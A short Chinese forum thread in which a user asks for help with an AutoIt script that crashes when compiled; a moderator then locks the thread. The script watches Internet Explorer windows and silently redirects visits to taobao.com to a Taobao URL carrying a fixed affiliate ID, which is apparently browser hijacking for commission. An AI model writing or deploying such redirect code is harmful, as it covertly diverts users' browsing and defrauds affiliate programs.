出大问题。请各路高手速速来,观战!
http://www.china58.net/au3.jpg这下面是代码,当我编译成EXE的时候就会出现像上面的错误,请高手看看!
While 1
Sleep(400)
$oShell = ObjCreate('shell.application')
$oShellWindows = $oShell.windows
For $Window In $oShellWindows
If StringRight($Window.FullName, 12) = 'iexplore.exe' Then
If $Window.locationurl='http://www.taobao.com/' or $Window.locationurl='http://taobao.com' Then $Window.navigate('http://pindao.huoban.taobao.com/tms/channel/channelcode.htm?pid=mm_12447901_1946460_8927158&mode=86')
EndIf
Next
WEnd 补充一点:是在关IE的时候才会出现的! 不明白为什么不用IE.udf 用IE.udf 就不会出这样的问了吗? 楼主注册也不是一两天了,竟然用如此的标题,看着气大,锁了!
页:
[1]